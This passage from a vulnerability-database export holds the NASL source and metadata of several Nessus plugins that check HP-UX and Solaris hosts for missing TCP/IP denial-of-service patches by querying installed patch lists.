This vulnerability could be remotely exploited to cause a Denial of Service (DoS). (HPSBUX01137 SSRT5954)\n\n - A potential security vulnerability has been identified with HP-UX running TCP/IP. This vulnerability could be remotely exploited by an unauthorized user to cause a Denial of Service(DoS). References: NISCC VU#532967, CAN-2004-0790, CAN-2004-0791, CAN-2004-1060.\n (HPSBUX01164 SSRT4884)", "cvss3": {"score": null, "vector": null}, "published": "2005-07-05T00:00:00", "type": "nessus", "title": "HP-UX PHNE_33159 : s700_800 11.11 cumulative ARPA Transport patch", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "CVE-2005-1192"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHNE_33159.NASL", "href": "https://www.tenable.com/plugins/nessus/18608", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_33159. 
The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(18608);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2004-0790\", \"CVE-2004-0791\", \"CVE-2004-1060\", \"CVE-2005-1192\");\n script_bugtraq_id(13124);\n script_xref(name:\"CERT\", value:\"532967\");\n script_xref(name:\"HP\", value:\"emr_na-c00571568\");\n script_xref(name:\"HP\", value:\"emr_na-c00576017\");\n script_xref(name:\"HP\", value:\"HPSBUX01137\");\n script_xref(name:\"HP\", value:\"HPSBUX01164\");\n script_xref(name:\"HP\", value:\"SSRT4884\");\n script_xref(name:\"HP\", value:\"SSRT5954\");\n\n script_name(english:\"HP-UX PHNE_33159 : s700_800 11.11 cumulative ARPA Transport patch\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.11 cumulative ARPA Transport patch : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential security vulnerability has been identified\n with HP-UX running TCP/IP (IPv4). This vulnerability\n could be remotely exploited to cause a Denial of Service\n (DoS). (HPSBUX01137 SSRT5954)\n\n - A potential security vulnerability has been identified\n with HP-UX running TCP/IP. This vulnerability could be\n remotely exploited by an unauthorized user to cause a\n Denial of Service(DoS). 
References: NISCC VU#532967,\n CAN-2004-0790, CAN-2004-0791, CAN-2004-1060.\n (HPSBUX01164 SSRT4884)\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00571568\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9aacfc53\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00576017\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3a3e8ad7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_33159 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/06/24\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2006/01/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/05\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/04/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, 
\"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.11\"))\n{\n exit(0, \"The host is not affected since PHNE_33159 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_33159\", \"PHNE_33628\", \"PHNE_34135\", \"PHNE_34672\", \"PHNE_35183\", \"PHNE_35351\", \"PHNE_36125\", \"PHNE_37671\", \"PHNE_37898\", \"PHNE_38678\", \"PHNE_39386\", \"PHNE_42029\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"Networking.NET-KRN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET-PRG\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET-RUN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET-RUN-64\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET2-KRN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"Networking.NMS2-KRN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"Networking.NW-ENG-A-MAN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"OS-Core.CORE-KRN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"OS-Core.CORE2-KRN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"OS-Core.SYS-ADMIN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"ProgSupport.C-INC\", version:\"B.11.11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T13:17:06", "description": "s700_800 11.23 cumulative ARPA Transport patch : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential security vulnerability has been identified with HP-UX running 
TCP/IP. This vulnerability could be remotely exploited by an unauthorized user to cause a Denial of Service(DoS). References: NISCC VU#532967, CAN-2004-0790, CAN-2004-0791, CAN-2004-1060.\n (HPSBUX01164 SSRT4884)\n\n - A potential security vulnerability has been identified with HP-UX running TCP/IP (IPv4). This vulnerability could be remotely exploited to cause a Denial of Service (DoS). (HPSBUX01137 SSRT5954)", "cvss3": {"score": null, "vector": null}, "published": "2005-08-01T00:00:00", "type": "nessus", "title": "HP-UX PHNE_32606 : s700_800 11.23 cumulative ARPA Transport patch", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "CVE-2005-1192"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHNE_32606.NASL", "href": "https://www.tenable.com/plugins/nessus/19362", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_32606. 
The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(19362);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2004-0790\", \"CVE-2004-0791\", \"CVE-2004-1060\", \"CVE-2005-1192\");\n script_bugtraq_id(13124);\n script_xref(name:\"CERT\", value:\"532967\");\n script_xref(name:\"HP\", value:\"emr_na-c00571568\");\n script_xref(name:\"HP\", value:\"emr_na-c00576017\");\n script_xref(name:\"HP\", value:\"HPSBUX01137\");\n script_xref(name:\"HP\", value:\"HPSBUX01164\");\n script_xref(name:\"HP\", value:\"SSRT4884\");\n script_xref(name:\"HP\", value:\"SSRT5954\");\n\n script_name(english:\"HP-UX PHNE_32606 : s700_800 11.23 cumulative ARPA Transport patch\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.23 cumulative ARPA Transport patch : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential security vulnerability has been identified\n with HP-UX running TCP/IP. This vulnerability could be\n remotely exploited by an unauthorized user to cause a\n Denial of Service(DoS). References: NISCC VU#532967,\n CAN-2004-0790, CAN-2004-0791, CAN-2004-1060.\n (HPSBUX01164 SSRT4884)\n\n - A potential security vulnerability has been identified\n with HP-UX running TCP/IP (IPv4). This vulnerability\n could be remotely exploited to cause a Denial of Service\n (DoS). 
(HPSBUX01137 SSRT5954)\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00571568\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9aacfc53\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00576017\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3a3e8ad7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_32606 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/06/30\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2006/01/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/08/01\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/04/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) 
audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.23\"))\n{\n exit(0, \"The host is not affected since PHNE_32606 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_32606\", \"PHNE_33798\", \"PHNE_34671\", \"PHNE_35182\", \"PHNE_35765\", \"PHNE_35766\", \"PHNE_37395\", \"PHNE_37670\", \"PHNE_37897\", \"PHNE_38679\", \"PHNE_39387\", \"PHNE_41436\", \"PHNE_42094\", \"PHNE_43215\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"Networking.NET-PRG\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET-RUN\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET2-KRN\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET2-RUN\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"Networking.NMS2-KRN\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"Networking.NW-ENG-A-MAN\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"OS-Core.CORE2-KRN\", version:\"B.11.23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T13:17:54", "description": "s700_800 11.11 cumulative ARPA Transport patch : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential security vulnerability has been identified with HP-UX running TCP/IP. This vulnerability could be remotely exploited by an unauthorized user to cause a Denial of Service(DoS). 
References: NISCC VU#532967, CAN-2004-0790, CAN-2004-0791, CAN-2004-1060.\n (HPSBUX01164 SSRT4884)\n\n - An HP-UX 11.11 machine with TRANSPORT patches PHNE_24211, PHNE_24506, PHNE_25134, or PHNE_25642 may be exposed to a denial of service through the malicious use of the 'ndd' command. (HPSBUX00192 SSRT071390)\n\n - TCP Initial Sequence Number (ISN) randomization specified in RFC 1948 is available for HP-UX.\n References: CVE-2001-0328, CERT CA-2001-09. (HPSBUX00205 SSRT080009)", "cvss3": {"score": null, "vector": null}, "published": "2005-02-16T00:00:00", "type": "nessus", "title": "HP-UX PHNE_25644 : s700_800 11.11 cumulative ARPA Transport patch", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2001-0328", "CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHNE_25644.NASL", "href": "https://www.tenable.com/plugins/nessus/16508", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_25644. 
The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(16508);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2001-0328\", \"CVE-2004-0790\", \"CVE-2004-0791\", \"CVE-2004-1060\");\n script_bugtraq_id(13124);\n script_xref(name:\"CERT-CC\", value:\"2001-09\");\n script_xref(name:\"CERT\", value:\"532967\");\n script_xref(name:\"HP\", value:\"emr_na-c00576017\");\n script_xref(name:\"HP\", value:\"emr_na-c00994439\");\n script_xref(name:\"HP\", value:\"emr_na-c01336000\");\n script_xref(name:\"HP\", value:\"HPSBUX00192\");\n script_xref(name:\"HP\", value:\"HPSBUX00205\");\n script_xref(name:\"HP\", value:\"HPSBUX01164\");\n script_xref(name:\"HP\", value:\"SSRT071390\");\n script_xref(name:\"HP\", value:\"SSRT080009\");\n script_xref(name:\"HP\", value:\"SSRT4884\");\n\n script_name(english:\"HP-UX PHNE_25644 : s700_800 11.11 cumulative ARPA Transport patch\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.11 cumulative ARPA Transport patch : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential security vulnerability has been identified\n with HP-UX running TCP/IP. This vulnerability could be\n remotely exploited by an unauthorized user to cause a\n Denial of Service(DoS). References: NISCC VU#532967,\n CAN-2004-0790, CAN-2004-0791, CAN-2004-1060.\n (HPSBUX01164 SSRT4884)\n\n - An HP-UX 11.11 machine with TRANSPORT patches\n PHNE_24211, PHNE_24506, PHNE_25134, or PHNE_25642 may be\n exposed to a denial of service through the malicious use\n of the 'ndd' command. 
(HPSBUX00192 SSRT071390)\n\n - TCP Initial Sequence Number (ISN) randomization\n specified in RFC 1948 is available for HP-UX.\n References: CVE-2001-0328, CERT CA-2001-09. (HPSBUX00205\n SSRT080009)\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00994439\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b75e5227\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01336000\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?47614ae6\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00576017\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3a3e8ad7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_25644 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2002/04/26\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2006/01/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/02/16\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/04/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", 
\"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.11\"))\n{\n exit(0, \"The host is not affected since PHNE_25644 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_25644\", \"PHNE_27063\", \"PHNE_28089\", \"PHNE_28895\", \"PHNE_29887\", \"PHNE_31247\", \"PHNE_33159\", \"PHNE_33628\", \"PHNE_34135\", \"PHNE_34672\", \"PHNE_35183\", \"PHNE_35351\", \"PHNE_36125\", \"PHNE_37671\", \"PHNE_37898\", \"PHNE_38678\", \"PHNE_39386\", \"PHNE_42029\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"Networking.NET-KRN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET-PRG\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET-RUN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET-RUN-64\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET2-KRN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"Networking.NMS2-KRN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"Networking.NW-ENG-A-MAN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"OS-Core.CORE-KRN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"OS-Core.CORE2-KRN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"OS-Core.SYS-ADMIN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"ProgSupport.C-INC\", version:\"B.11.11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else 
security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T13:16:47", "description": "s700_800 11.04 (VVOS) cumulative ARPA Transport patch : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential security vulnerability has been identified with HP-UX running TCP/IP. This vulnerability could be remotely exploited by an unauthorized user to cause a Denial of Service(DoS). References: NISCC VU#532967, CAN-2004-0790, CAN-2004-0791, CAN-2004-1060.\n (HPSBUX01164 SSRT4884)\n\n - A potential security vulnerability has been identified with HP-UX running TCP/IP. The potential vulnerability could be exploited remotely to cause a Denial of Service (DoS). (HPSBUX02087 SSRT4728)", "cvss3": {"score": null, "vector": null}, "published": "2005-08-23T00:00:00", "type": "nessus", "title": "HP-UX PHNE_33427 : s700_800 11.04 (VVOS) cumulative ARPA Transport patch", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0744", "CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "CVE-2005-4316"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHNE_33427.NASL", "href": "https://www.tenable.com/plugins/nessus/19486", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_33427. 
The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(19486);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2004-0744\", \"CVE-2004-0790\", \"CVE-2004-0791\", \"CVE-2004-1060\", \"CVE-2005-4316\");\n script_bugtraq_id(13124);\n script_xref(name:\"CERT\", value:\"532967\");\n script_xref(name:\"HP\", value:\"emr_na-c00576017\");\n script_xref(name:\"HP\", value:\"emr_na-c00579189\");\n script_xref(name:\"HP\", value:\"HPSBUX01164\");\n script_xref(name:\"HP\", value:\"HPSBUX02087\");\n script_xref(name:\"HP\", value:\"SSRT4728\");\n script_xref(name:\"HP\", value:\"SSRT4884\");\n\n script_name(english:\"HP-UX PHNE_33427 : s700_800 11.04 (VVOS) cumulative ARPA Transport patch\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.04 (VVOS) cumulative ARPA Transport patch : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential security vulnerability has been identified\n with HP-UX running TCP/IP. This vulnerability could be\n remotely exploited by an unauthorized user to cause a\n Denial of Service(DoS). References: NISCC VU#532967,\n CAN-2004-0790, CAN-2004-0791, CAN-2004-1060.\n (HPSBUX01164 SSRT4884)\n\n - A potential security vulnerability has been identified\n with HP-UX running TCP/IP. The potential vulnerability\n could be exploited remotely to cause a Denial of Service\n (DoS). 
(HPSBUX02087 SSRT4728)\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00576017\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3a3e8ad7\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00579189\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d45f7410\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_33427 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/08/11\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2006/01/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/08/23\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/08/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) 
audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.04\"))\n{\n exit(0, \"The host is not affected since PHNE_33427 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_33427\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"Networking.NET-KRN\", version:\"B.11.04\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET-PRG\", version:\"B.11.04\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET-RUN\", version:\"B.11.04\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET2-KRN\", version:\"B.11.04\")) flag++;\nif (hpux_check_patch(app:\"Networking.NMS2-KRN\", version:\"B.11.04\")) flag++;\nif (hpux_check_patch(app:\"OS-Core.CORE2-KRN\", version:\"B.11.04\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-08-19T13:17:05", "description": "SunOS 5.10: kernel Patch.\nDate this patch was last updated by Sun : Feb/23/06", "cvss3": {"score": null, "vector": null}, "published": "2005-08-02T00:00:00", "type": "nessus", "title": "Solaris 10 (sparc) : 118822-30", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2005-3250", "CVE-2005-4701", "CVE-2008-1095"], "modified": "2021-01-14T00:00:00", "cpe": [], "id": "SOLARIS10_118822.NASL", "href": "https://www.tenable.com/plugins/nessus/19367", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a recommended security fix.\n#\n# Disabled on 2011/09/17.\n\n#\n# (C) Tenable Network Security, Inc.\n#\n#\n\nif ( ! 
defined_func(\"bn_random\") ) exit(0);\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif(description)\n{\n script_id(19367);\n script_version(\"1.39\");\n\n script_name(english: \"Solaris 10 (sparc) : 118822-30\");\n script_cve_id(\"CVE-2004-0790\", \"CVE-2004-0791\", \"CVE-2005-3250\", \"CVE-2005-4701\", \"CVE-2008-1095\");\n script_set_attribute(attribute: \"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 118822-30\");\n script_set_attribute(attribute: \"description\", value:\n'SunOS 5.10: kernel Patch.\nDate this patch was last updated by Sun : Feb/23/06');\n script_set_attribute(attribute: \"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_attribute(attribute: \"see_also\", value:\n\"https://getupdates.oracle.com/readme/118822-30\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:N/A:C\");\n script_cwe_id(264);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/08/02\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/10/13\");\n script_end_attributes();\n\n script_summary(english: \"Check for patch 118822-30\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n family[\"english\"] = \"Solaris Local 